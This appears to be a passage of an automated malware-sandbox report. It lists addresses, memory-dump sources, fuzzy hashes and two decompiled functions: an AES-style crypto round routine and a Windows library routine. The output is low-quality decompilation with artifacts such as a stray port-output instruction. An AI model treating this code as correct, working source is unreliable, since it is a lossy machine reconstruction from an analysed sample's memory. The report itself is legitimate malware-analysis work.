0x01434463
0x01434463
0x014343ce
0x014343d5
0x014343d9
0x014343df
0x01434475
0x01434479
0x01434491
0x01434491
0x01434479
0x014343e5
0x014343eb
0x014343f4
0x014343f6
0x014343f9
0x014343fc
0x014343ff
0x014344e8
0x014344ed
0x014344f3
0x0147e247
0x00000000
0x014344f9
0x01434504
0x01434508
0x0143450f
0x0147e269
0x00000000
0x01434515
0x01434519
0x01434531
0x01434534
0x01434537
0x0143453e
0x01434541
0x0143454a
0x0147e255
0x0147e255
0x0147e25b
0x0147e25e
0x0147e261
0x0147e261
0x01434555
0x01434559
0x0143455d
0x0147e26d
0x0147e270
0x0147e274
0x0147e27a
0x0147e27d
0x0147e28e
0x0147e28e
0x01434563
0x01434563
0x01434569
0x01434569
0x00000000
0x0143455d
0x0143450f
0x00000000
0x014344f3
0x014343ff
0x01434405
0x01434405
0x01434405
0x014342ac
0x0143428c
0x01434282
0x01434407
0x0143440d
0x0147e2af
0x0147e2af
0x01434413
0x01434413
0x00000000
0x014341d4
0x00000000
0x014341c3
0x014341bd
0x01434415
0x01434415
0x01434416
0x01434417
0x01434429
0x0143416e
0x0143416e
0x01434175
0x01434498
0x0143449f
0x0147e12d
0x00000000
0x0147e133
0x00000000
0x0147e133
0x014344a5
0x014344a5
0x014344aa
0x00000000
0x014344bb
0x014344ca
0x014344d6
0x014344d7
0x014344d8
0x014344e3
0x014344e3
0x014344aa
0x0143417b
0x0143417b
0x0143417b
0x00000000
0x0143417b
0x01434175
0x00000000

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d8dec91d1b9acb85c7551510faedca07a17d0e412869f6d961d406b07716296
Instruction ID: b5f9cc5ec659e2cc64b515aaabb4b7ba04072ce079c05fc7c16c06de6081d86f
Opcode Fuzzy Hash: 5d8dec91d1b9acb85c7551510faedca07a17d0e412869f6d961d406b07716296
Instruction Fuzzy Hash: DDF17D706082118BC724CF59C480ABBBBE1EF98754F18496FF986DB3A1E734D985CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00402FB0, Relevance: .4, Instructions: 435
COMMONCrypto

Download Yara Rule

C-Code - Quality: 27%

			E00402FB0(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t273;
				signed int _t274;
				signed int _t282;
				signed int* _t358;
				signed int _t384;
				signed int* _t410;
				signed int _t431;
				signed int _t434;
				signed int _t460;
				signed int _t480;
				signed int _t521;
				signed int _t561;
				signed int _t604;

				_t273 = __eax;
				asm("ror edi, 0x8");
				asm("rol edx, 0x8");
				_t460 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_v20 = _t460;
				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
				asm("ror esi, 0x8");
				asm("rol edx, 0x8");
				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
				asm("ror edx, 0x10");
				asm("ror esi, 0x8");
				asm("rol esi, 0x8");
				_v24 = _t282;
				_t431 =  *(__eax + 4 + (_t282 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t460 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
				asm("ror esi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t604 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t282 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t460 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
				asm("ror ebx, 0x8");
				asm("ror edi, 0x10");
				asm("rol edi, 0x8");
				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t460 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
				asm("ror edi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t410 =  &(__ecx[8]);
				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t410 - 4);
				_t480 = (_a4 >> 1) - 1;
				_a4 = _t480;
				if(_t480 != 0) {
					do {
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t604 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t431 >> 0x00000018 & 0x000000ff) * 4) ^  *_t410;
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t431 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t604 >> 0x00000018 & 0x000000ff) * 4) ^ _t410[1];
						asm("ror ebx, 0x8");
						asm("ror edi, 0x10");
						asm("rol edi, 0x8");
						_t384 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t431 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t604 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t410[2];
						asm("ror edi, 0x10");
						asm("ror edx, 0x8");
						asm("rol edx, 0x8");
						_v24 = _t384;
						_t561 =  *(__eax + 4 + (_t604 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t431 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t410[3];
						asm("ror edx, 0x10");
						asm("ror esi, 0x8");
						asm("rol esi, 0x8");
						_t431 =  *(__eax + 4 + (_t384 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t561 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t410[4];
						asm("ror esi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_t604 =  *(__eax + 4 + (_t561 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t384 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t410[5];
						_v12 = _t561;
						asm("ror edi, 0x8");
						asm("ror ebx, 0x10");
						asm("rol ebx, 0x8");
						_v16 =  *(__eax + 4 + (_t561 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t410[6];
						asm("ror ebx, 0x10");
						asm("ror edi, 0x8");
						asm("rol edi, 0x8");
						_t410 =  &(_t410[8]);
						_t205 =  &_a4;
						 *_t205 = _a4 - 1;
						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t410 - 4);
					} while ( *_t205 != 0);
				}
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				 *_a8 = (( *(_t273 + 4 + (_t431 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t604 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t410) & 0xff00ff00 | (( *(_t273 + 4 + (_t431 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t604 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t410) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_a8[1] = (( *(_t273 + 4 + (_t604 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t431 & 0x000000ff) * 4) & 0x000000ff ^ _t410[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t604 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t431 & 0x000000ff) * 4) & 0x000000ff ^ _t410[1]) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_t358 = _a8;
				_t358[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t431 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t604 & 0x000000ff) * 4) & 0x000000ff ^ _t410[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t431 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t604 & 0x000000ff) * 4) & 0x000000ff ^ _t410[2]) & 0x00ff00ff;
				_t434 =  *(_t273 + 4 + (_t431 >> 0x00000010 & 0x000000ff) * 4);
				_t521 =  *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000;
				asm("out 0x8, eax");
				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
				asm("ror ecx, 0x8");
				asm("rol edi, 0x8");
				 *(_t358 + _t358 + 0xc) = (_t521 ^ _t434 & 0x00ff0000 ^  *(_t273 + 4 + (_t604 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t410[3]) & 0xff00ff00 | (_t521 ^ _t434 & 0x00ff0000 ^  *(_t273 + 4 + (_t604 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t410[3]) & 0x00ff00ff;
				return _t274;
			}

0x00402fb0
0x00402fbf
0x00402fc8
0x00402fd6
0x00402fda
0x00402fe3
0x00402ff4
0x00402ff7
0x00402ffc
0x00403005
0x00403013
0x00403018
0x00403021
0x00403031
0x00403051
0x00403054
0x00403066
0x0040306b
0x00403080
0x0040309d
0x004030a0
0x004030b1
0x004030c6
0x004030e6
0x004030e9
0x004030fb
0x00403119
0x00403136
0x00403139
0x0040314b
0x00403160
0x00403166
0x0040316e
0x0040316f
0x00403172
0x00403180
0x00403190
0x004031a2
0x004031b4
0x004031d0
0x004031e3
0x004031f0
0x00403201
0x00403218
0x0040323a
0x0040323d
0x0040324e
0x00403269
0x00403280
0x00403283
0x00403295
0x0040329d
0x004032b2
0x004032cf
0x004032d2
0x004032e3
0x00403307
0x00403317
0x0040331a
0x0040332c
0x00403344
0x00403347
0x0040335a
0x00403367
0x00403379
0x00403391
0x004033b4
0x004033b7
0x004033c9
0x004033de
0x004033e4
0x004033e4
0x004033e7
0x004033e7
0x00403180
0x0040344b
0x00403454
0x00403462
0x004034c0
0x004034c9
0x004034d7
0x00403539
0x00403542
0x0040354f
0x00403552
0x0040356b
0x0040356f
0x00403576
0x0040359e
0x004035aa
0x004035b3
0x004035c0
0x004035c7

Memory Dump Source

Source File: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
Instruction ID: 3a980b568be2ae1ecdc62ef5b70c599cea3cbb84bd4cfa04f309e58bee3fdca8
Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
Instruction Fuzzy Hash: 37026E73E547164FE720CE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90

Uniqueness

Uniqueness Score: -1.00%

Function 014420A0, Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E014420A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x1508714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E01442EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E01442EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E014158EC(_t240);
									_t221 =  *0x1505cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x1505cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E01454A2C(0x1506e40, 0x1454b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E01437D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x13f5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0144F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0144F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E01497016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L01432400(_t267 + 0x20);
															}
															L01432400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E01442397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E01432280(_t134, 0x1508608);
									__eflags =  *0x1506e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E0142FFB0(_t198, _t241, 0x1508608);
										__eflags = _t253;
										if(_t253 != 0) {
											L014377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x1506e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x1508608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E01446B90(_t210,  &_v64);
										_t262 =  *0x1508608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0144E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E014597C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0145006A(0x1508608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x1508608);
												E0145B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x1506904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x1506e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E0142FFB0(_t198, _t240, 0x1508608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E014500C2(0x1508608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x014420a0
0x014420a8
0x014420ad
0x014420b3
0x014420b8
0x014420c2
0x014420c7
0x014420cb
0x014420d2
0x01442263
0x01442266
0x01485836
0x01485836
0x00000000
0x0144226c
0x0144226c
0x01442270
0x01442274
0x014420e2
0x014420e2
0x014420e6
0x014420ee
0x014857dc
0x014857de
0x014857ec
0x014857ec
0x014857f1
0x014857f3
0x014857f8
0x00000000
0x014857f8
0x014857e0
0x014857e4
0x014857ea
0x00000000
0x00000000
0x00000000
0x014857ea
0x014420f4
0x014420f4
0x014420f8
0x014420f8
0x014420fc
0x01442100
0x01442106
0x01442201
0x01442206
0x0144220b
0x0144220e
0x014422a9
0x014422ac
0x00000000
0x00000000
0x014422b2
0x014422b5
0x01485801
0x01485806
0x00000000
0x00000000
0x01485810
0x01485815
0x01485818
0x00000000
0x00000000
0x0148581e
0x014422bb
0x014422bb
0x01442218
0x01442218
0x0144221c
0x01442220
0x01442222
0x014422c2
0x014422c4
0x014422dc
0x014422dc
0x014422e1
0x00000000
0x00000000
0x00000000
0x014422e7
0x014422c8
0x014422cd
0x014422d3
0x014422d6
0x01485823
0x01485825
0x01485827
0x00000000
0x00000000
0x0148582d
0x00000000
0x0148582d
0x00000000
0x01442228
0x01442228
0x00000000
0x01442228
0x01442222
0x01442214
0x01442214
0x00000000
0x01442114
0x01442114
0x01442114
0x0144211a
0x0144211c
0x01442348
0x0144234d
0x01485840
0x01485845
0x01485848
0x0148584e
0x0148584e
0x01485848
0x01442353
0x01442355
0x01442388
0x01442388
0x01442368
0x0144236a
0x0144236c
0x0144238f
0x00000000
0x0144236e
0x0144236e
0x0144218e
0x0144218e
0x01442191
0x01442195
0x01485a03
0x01485a06
0x01485a0c
0x01485a0f
0x01485a11
0x01485a13
0x01485a13
0x01485a19
0x01485a1f
0x00000000
0x0144219b
0x0144219b
0x014421a0
0x01442282
0x01442284
0x01442284
0x01442284
0x01442284
0x014421a6
0x014421a9
0x014421ac
0x014421ae
0x014421b3
0x0144228b
0x01442290
0x01442379
0x01442296
0x01442298
0x01442298
0x01442290
0x014421b9
0x014421be
0x014422a2
0x014422a2
0x014421c4
0x014421c8
0x014421cc
0x014421d0
0x014421d4
0x014421de
0x014421e3
0x01485a29
0x01485a2c
0x00000000
0x00000000
0x01485a3b
0x00000000
0x014421e9
0x014421e9
0x014421e9
0x014421ee
0x014421f1
0x01485a45
0x01485a4b
0x01485a52
0x01485a58
0x01485a5d
0x01485a5f
0x01485a71
0x01485a61
0x01485a6a
0x01485a6a
0x01485a76
0x01485a79
0x01485a7f
0x01485a83
0x01485a85
0x01485a87
0x01485a87
0x01485a8c
0x01485a91
0x01485a97
0x01485a9f
0x01485aa0
0x01485aa1
0x01485aa6
0x01485aab
0x01485ab1
0x01485ab3
0x01485ab9
0x01485aca
0x01485ad4
0x01485ad4
0x01485ade
0x01485ade
0x01485aab
0x01485a79
0x01485a52
0x014421f7
0x014421f9
0x014421fe
0x014421fe
0x014421e3
0x01442195
0x0144236c
0x01442122
0x01442122
0x01442124
0x01442231
0x01442236
0x01442236
0x01442238
0x01442238
0x01442240
0x01442242
0x01442244
0x014859fc
0x0144218c
0x0144218c
0x00000000
0x0144218c
0x0144224a
0x0144224f
0x01442256
0x01442304
0x01442309
0x0144230f
0x0144231e
0x0144231e
0x0144231e
0x01442320
0x01442325
0x0144232a
0x0144232c
